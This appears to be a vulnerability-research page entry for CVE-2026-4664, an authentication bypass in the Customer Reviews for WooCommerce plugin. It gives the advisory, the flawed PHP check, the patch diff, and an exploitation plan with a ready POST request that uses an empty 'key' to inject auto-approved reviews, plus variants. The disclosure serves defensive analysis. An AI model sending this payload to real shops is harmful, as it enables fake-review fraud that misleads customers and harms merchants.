[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZLMCyHLQcfLLRGrHq1b4C8QTYtfuoshTFX68JbLVyLo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"source_links":38},"CVE-2026-4664","customer-reviews-for-woocommerce-unauthenticated-authentication-bypass-to-arbitrary-review-submission-via-key-parameter","Customer Reviews for WooCommerce \u003C= 5.103.0 - Unauthenticated Authentication Bypass to Arbitrary Review Submission via 'key' Parameter","The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.103.0. This is due to the `create_review_permissions_check()` function comparing the user-supplied `key` parameter against the order's `ivole_secret_key` meta value using strict equality (`===`), without verifying that the stored key is non-empty. For orders where no review reminder email has been sent, the `ivole_secret_key` meta is not set, causing `get_meta()` to return an empty string. An attacker can supply `key: \"\"` to match this empty value and bypass the permission check. This makes it possible for unauthenticated attackers to submit, modify, and inject product reviews on any product — including products not associated with the referenced order — via the REST API endpoint `POST \u002Fivole\u002Fv1\u002Freview`. Reviews are auto-approved by default since `ivole_enable_moderation` defaults to `\"no\"`.","customer-reviews-woocommerce",null,"\u003C=5.103.0","5.104.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Improper Authentication","2026-04-09 12:26:12","2026-04-10 01:24:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F27e3dfe3-ad33-4d0c-a999-d0734df2f59b?source=api-prod",1,[22,23,24,25,26],"class-ivole.php","includes\u002Freviews\u002Fclass-cr-endpoint.php","includes\u002Fsettings\u002Fclass-cr-admin-menu-settings.php","ivole.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-4664\n\n## 1. Vulnerability Summary\nThe **Customer Reviews for WooCommerce** plugin (up to 5.103.0) contains an improper authentication vulnerability in its REST API implementation. The endpoint `POST \u002Fwp-json\u002Fivole\u002Fv1\u002Freview` uses a permission check function (`create_review_permissions_check`) that validates access by comparing a user-provided `key` parameter against a specific order's meta value (`ivole_secret_key`). \n\nThe vulnerability exists because:\n1.  The plugin uses strict equality (`===`) for the comparison.\n2.  The `ivole_secret_key` meta is only generated when a review reminder email is sent.\n3.  For orders where no reminder has been sent, `get_post_meta()` returns an empty string (`\"\"`).\n4.  An attacker can provide an empty `key` parameter, which strictly matches the empty meta value, bypassing authentication.\n\n## 2. Attack Vector Analysis\n-   **Endpoint:** `\u002Fwp-json\u002Fivole\u002Fv1\u002Freview`\n-   **Method:** `POST`\n-   **Authentication:** Unauthenticated (Bypassed via `key` parameter).\n-   **Vulnerable Parameter:** `key` (within JSON body or query string).\n-   **Payload:** A JSON object containing a valid `order` ID and an array of `items` to review.\n-   **Preconditions:**\n    -   At least one WooCommerce Order must exist in the database.\n    -   The Order ID must be known (IDs are sequential\u002Fguessable).\n    -   The `ivole_secret_key` meta must not have been set for that order (common for new or unprocessed orders).\n\n## 3. Code Flow\n1.  **Entry Point:** `CR_Endpoint::register_routes()` in `includes\u002Freviews\u002Fclass-cr-endpoint.php` registers the route `\u002Fivole\u002Fv1\u002Freview`.\n2.  **Permission Check:** Before execution, `create_review_permissions_check()` is called.\n    -   It retrieves the `order_id` from the request.\n    -   It calls `get_post_meta( $order_id, 'ivole_secret_key', true )`.\n    -   If the meta is missing, the result is `\"\"`.\n    -   It compares this against the `key` param from the request. If `\"\" === \"\"`, it returns `true`.\n3.  **Callback:** `CR_Endpoint::create_review_callback()` is executed.\n    -   It decodes the JSON body into `$body2`.\n    -   It calls `self::create_review( $body2, false )`.\n4.  **Sink:** `CR_Endpoint::create_review()` processes the review data.\n    -   It instantiates the order: `$order = new WC_Order( $order_id )`.\n    -   It iterates through `$body2->order->items`.\n    -   It creates a WordPress comment for each item (product) with `comment_type` set to `review`.\n    -   Reviews are auto-approved if `ivole_enable_moderation` is `'no'` (the default).\n\n## 4. Nonce Acquisition Strategy\nThis specific vulnerability targets a custom REST API endpoint intended for external use (CusRev service). The `permission_callback` handles authorization via the `key` parameter. Standard WordPress REST API nonces (`_wpnonce`) are **not required** for this endpoint if the `permission_callback` returns `true`.\n\n**No nonce acquisition is necessary for this exploit.**\n\n## 5. Exploitation Strategy\nThe goal is to submit an unauthenticated review for a product by referencing a valid order ID with an empty secret key.\n\n### Step-by-Step Plan:\n1.  **Identify Targets:** Find a valid Product ID and a valid Order ID.\n2.  **Prepare Payload:** Create a JSON object that includes the `key` (empty), the `order` ID, and the review details.\n3.  **Send Request:** Execute a POST request to the REST API.\n\n### HTTP Request Details:\n-   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fivole\u002Fv1\u002Freview`\n-   **Method:** `POST`\n-   **Headers:** `Content-Type: application\u002Fjson`\n-   **Body:**\n```json\n{\n  \"key\": \"\",\n  \"order\": {\n    \"id\": 123,\n    \"items\": [\n      {\n        \"id\": 456,\n        \"rating\": 5,\n        \"comment\": \"This product was amazing! (Injected Review)\"\n      }\n    ]\n  }\n}\n```\n*(Replace `123` with a valid Order ID and `456` with a valid Product ID)*.\n\n## 6. Test Data Setup\nTo reliably test this, the following environment state is required:\n1.  **WooCommerce Active:** Must be installed and configured.\n2.  **Target Product:** Create a product with ID `X`.\n    -   `wp post create --post_type=product --post_title='Target Product' --post_status=publish`\n3.  **Target Order:** Create an order with ID `Y` that includes any product.\n    -   `wp wc shell --command=\"\\$order = wc_create_order(); \\$order->add_product(get_product(X)); \\$order->set_billing_email('victim@example.com'); \\$order->save();\"`\n4.  **Plugin Setting:** Ensure moderation is off (default).\n    -   `wp option update ivole_enable_moderation 'no'`\n\n## 7. Expected Results\n-   **HTTP Response:** `200 OK` or `201 Created`.\n-   **Database State:** A new entry in the `wp_comments` table associated with the Product ID, having `comment_type` = `review` and `comment_approved` = `1`.\n\n## 8. Verification Steps\n1.  **Check via WP-CLI:**\n    ```bash\n    wp comment list --post_id=\u003CPRODUCT_ID> --status=approve\n    ```\n2.  **Confirm Meta:** Verify that the comment has the `rating` meta.\n    ```bash\n    wp comment meta list \u003CCOMMENT_ID>\n    ```\n3.  **UI Verification:** Navigate to the product page on the frontend and check the \"Reviews\" tab.\n\n## 9. Alternative Approaches\n-   **Shop Review Injection:** If product reviews are disabled, target the \"Shop Review\" feature by providing `shop_rating` and `shop_comment` in the `order` object instead of `items`.\n-   **Modifying Existing Reviews:** The plugin description mentions \"modify\" reviews. This may involve providing a `comment_id` in the payload if the code path supports updates (to be verified during execution by inspecting `create_review` logic for existing comment checks).\n-   **Parameter Placement:** If `key` in the JSON body is ignored by the permission check, try passing it as a query parameter: `POST \u002Fwp-json\u002Fivole\u002Fv1\u002Freview?key=`.","The Customer Reviews for WooCommerce plugin is vulnerable to an unauthenticated authentication bypass due to an insecure comparison in the `create_review_permissions_check` function. The function compares a user-provided `key` against an order's `ivole_secret_key` meta value using strict equality without ensuring the stored key is non-empty. An attacker can exploit this by providing an empty string for the `key` parameter to match uninitialized keys, allowing them to submit or modify product reviews via the `\u002Fivole\u002Fv1\u002Freview` REST API endpoint.","\u002F\u002F includes\u002Freviews\u002Fclass-cr-endpoint.php lines 646-662\n\n\t\tpublic function create_review_permissions_check( WP_REST_Request $request ) {\n\t\t\t$body = $request->get_body();\n\t\t\t$body2 = json_decode( $body );\n\t\t\tif( json_last_error() === JSON_ERROR_NONE ) {\n\t\t\t\tif( isset( $body2->key ) && isset( $body2->order ) ) {\n\t\t\t\t\tif( isset( $body2->order->id ) ) {\n\t\t\t\t\t\t$order = wc_get_order( $body2->order->id );\n\t\t\t\t\t\tif ( $order ) {\n\t\t\t\t\t\t\t$saved_key = $order->get_meta( 'ivole_secret_key', true );\n\t\t\t\t\t\t\tif( $body2->key === $saved_key ) {\n\t\t\t\t\t\t\t\treturn true;\n\t\t\t\t\t\t\t} else {","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcustomer-reviews-woocommerce\u002F5.103.0\u002Fincludes\u002Freviews\u002Fclass-cr-endpoint.php\t2026-03-23 02:09:54.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcustomer-reviews-woocommerce\u002F5.104.0\u002Fincludes\u002Freviews\u002Fclass-cr-endpoint.php\t2026-03-30 00:23:22.000000000 +0000\n@@ -646,13 +646,13 @@\n \t\tpublic function create_review_permissions_check( WP_REST_Request $request ) {\n \t\t\t$body = $request->get_body();\n \t\t\t$body2 = json_decode( $body );\n-\t\t\tif( json_last_error() === JSON_ERROR_NONE ) {\n-\t\t\t\tif( isset( $body2->key ) && isset( $body2->order ) ) {\n-\t\t\t\t\tif( isset( $body2->order->id ) ) {\n+\t\t\tif ( json_last_error() === JSON_ERROR_NONE ) {\n+\t\t\t\tif ( isset( $body2->key ) && isset( $body2->order ) ) {\n+\t\t\t\t\tif ( isset( $body2->order->id ) ) {\n \t\t\t\t\t\t$order = wc_get_order( $body2->order->id );\n \t\t\t\t\t\tif ( $order ) {\n \t\t\t\t\t\t\t$saved_key = $order->get_meta( 'ivole_secret_key', true );\n-\t\t\t\t\t\t\tif( $body2->key === $saved_key ) {\n+\t\t\t\t\t\t\tif ( ! empty( $saved_key ) && $body2->key === $saved_key ) {\n \t\t\t\t\t\t\t\treturn true;\n \t\t\t\t\t\t\t} else {\n \t\t\t\t\t\t\t\treturn new WP_Error(","To exploit this vulnerability, an unauthenticated attacker identifies a valid WooCommerce Order ID (IDs are typically sequential and guessable). Because the plugin only generates a secret key when a review reminder email is sent, many orders (like newly created or processed ones) will have an empty string stored for the `ivole_secret_key` meta. The attacker sends a POST request to `\u002Fwp-json\u002Fivole\u002Fv1\u002Freview` with a JSON payload where the `key` parameter is an empty string and the `order` object contains the target Order ID. By providing a product ID in the `items` array within that payload, the attacker can successfully submit a review. If the default moderation setting (`ivole_enable_moderation`) is 'no', the review is automatically approved and displayed on the site.","gemini-3-flash-preview","2026-04-16 16:18:48","2026-04-16 16:19:16",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","5.103.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-reviews-woocommerce\u002Ftags\u002F5.103.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-reviews-woocommerce.5.103.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-reviews-woocommerce\u002Ftags\u002F5.104.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-reviews-woocommerce.5.104.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-reviews-woocommerce\u002Ftags"]